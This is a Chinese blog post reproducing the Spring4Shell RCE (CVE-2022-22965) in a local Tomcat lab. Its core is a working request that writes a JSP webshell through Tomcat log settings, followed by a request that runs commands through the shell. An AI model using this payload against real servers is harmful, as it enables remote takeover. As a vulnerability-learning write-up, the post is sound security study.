CVE-2022-22965 漏洞复现学习

最新推荐文章于 2025-03-27 19:44:29 发布
最新推荐文章于 2025-03-27 19:44:29 发布
阅读量3.2k 收藏 2
点赞数
分类专栏: cve漏洞复现 文章标签: java web安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/124517417
版权
本文详细阐述了在JDK9及以上版本、Spring框架和Tomcat部署环境中,利用POJO参数绑定的漏洞进行Spring Framework特定版本远程代码执行(RCE)的方法,包括环境配置、POC请求示例和实际应用案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞利用条件

  • JDK 9+
  • Spring 及其衍生框架
  • 使用Tomcat部署spring项目
  • 使用了POJO参数绑定
  • Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本

二、环境搭建

1. 首先需要个实体类
public class HelloWorld {
   private String message;

   public String getMessage() {
       return message;
   }

   public void setMessage(String message) {
       this.message = message;
   }
}
3. 再写个controller传参为这个实体类型
@RestController @RequestMapping("/spring")
public class SpringRce {
   @RequestMapping("/rce")
   public void vulnerable(HelloWorld model) {
   }
}
4. 把项目打成war包放到Tomcat中部署运行

FIle — Project Structure
在这里插入图片描述
然后Build — Build Artifacts生成war包,放到Tomcatwebapps目录下,启动Tomcat

三、漏洞利用

1. 发送POC请求包

第一个包是通过Tomcat日志文件在webapps/ROOT下写一个jspshell

POST /java-sec/xstream HTTP/1.1
Cookie: JSESSIONID=0873A909194640CBAF9EEBC2283C6C97; XSRF-		TOKEN=1d91ead1-6fa9-4f1d-b8c9-5cf57dc020b8; remember-me=YWRtaW46MTY1MjUxMTU2MjQ1MTo2M2U2NmNkZjdkOWNhZDAyMzMyMjhhMjAwN2NiZTc4YQ
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 757

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

在这里插入图片描述

2. 命令执行

通过tomcatwar.jsp执行任意命令

GET /tomcatwar.jsp?pwd=j&cmd=hostname HTTP/1.1
Cookie: JSESSIONID=DF7BCBCC3317CB8B47DFD93C7F8D78FE; XSRF-TOKEN=08a2c187-4ca0-47df-8463-1189a6661f96; remember-me=YWRtaW46MTY1MjUzMjE2MTAxNTozODY1ZTMxOWU1NTg5NTMyYWZlNGQzNzhiN2Q4MGJjYg
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 0

在这里插入图片描述

四、测试中应用

黑盒盲打通过传一个classloader下的属性:class.module.classLoader.defaultAssertionStatus=123看服务端是否报异常
在这里插入图片描述

白盒的就是要满足上面的利用条件,或者找到POJO传参的controller再去尝试

漏洞复现学习手册
谢公子的博客
08-09 4176
JAVA反序列化漏洞复现 OpenSSH命令注入漏洞复现(CVE-2020-15778) F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902) DNS Server远程代码执行漏洞复现(CVE-2020-1350) CVE-2020-0688漏洞复现 CVE-2019-1040域内漏洞提权复现 CVE-2020-0796(SMBv3远程代码执行)漏洞复现 通达OA低版本文件上传+apache解析漏洞getshell 通达OA命令执行漏洞复现(文件上传+文件包含)
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 3150
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 5046
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
分享几个CVE漏洞复现
最新发布
xnxqwzy的博客
03-27 583
对网站设置域名解析点击此处一个登录界面,发现系统版本,查找历史漏洞,发现一个文件上传RCE漏洞下载下来查看参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE可以拿到shell,但是无法切换成交互模式换另一种方式,登录管理面板,密码为维吉尼亚解密密码成功登录,是管理员,点击设置查看进入后台,因为上面搜出来了文件上传RCE漏洞,所以找一找文件上传点发现此处,可以进行文件上传点击该处可以上传先上传一个txt文件试试,上传成功。
CVE-2022-22965Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 4万+
CVE-2022-22965Spring Framework远程代码执行漏洞
两个CVE漏洞复现
qq_44704184的博客
07-14 2581
简单复现两个漏洞
[漏洞复现]CVE-2020-1938漏洞复现
cj_Hydra's Blog
03-30 2566
前言: 漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 影响版本: Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0....
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3848
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1742
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
web安全CVE漏洞复现
weixin_46301214的博客
11-22 1030
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
【网络安全CVE漏洞分析以及复现
Android_wxf的博客
04-21 1911
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 844
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。
CVE-2021-42013 漏洞复现
爱吃仡坨的Blog
10-13 645
Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越。
CVE-2021-41773 漏洞复现
爱吃仡坨的Blog
10-13 741
Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../的路径穿越符当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在../。
Spring been CVE-2022-22965
王嘟嘟的博客
04-02 3929
0x00 前言 Spring bean的漏洞被吹的很火,比如放个打码的图片,然后弹个计算器。自己又比较拖拉,所以一直没有写完分析文章。而且Spring相关的内容一直没有整理,可能要到之后慢慢来进行整理。首先来说CVE-2022-22965,实际上这个漏洞的主要成因和cve-2010-1622一样,所以这两个漏洞写在一起。 JDK 9的发布时间为:2017-09-21,也就是说这个漏洞实际上是在野漏洞,距今也有5年了,如果是了解cve-2010-1622漏洞原因以及修复方式的同时了解JDK9的特性,那么这个利
PHP-FPM远程命令执行 CVE-2019-11043 漏洞复现
ADummy的博客
02-26 258
PHP-FPM远程命令执行(CVE-2019-11043) by ADummy 0x00利用路线 ​ 安装go环境—>下载利用工具—>写入shell—>getshell 0x01漏洞介绍 ​ 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_
CVE-2021-41773漏洞复现
Aquarius_ego的博客
03-24 1577
CVE-2021-41773漏洞复现
CVE-2017-3506 漏洞POC复现详细解析
同时,“cve-2017-3506复现”指的是如何在安全研究环境中重现这个漏洞,这对于了解漏洞细节、评估漏洞影响和测试潜在的补丁非常关键。 最后,在压缩包文件名称列表中只有一个文件“CVE-2017-3506-Poc.py”。这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值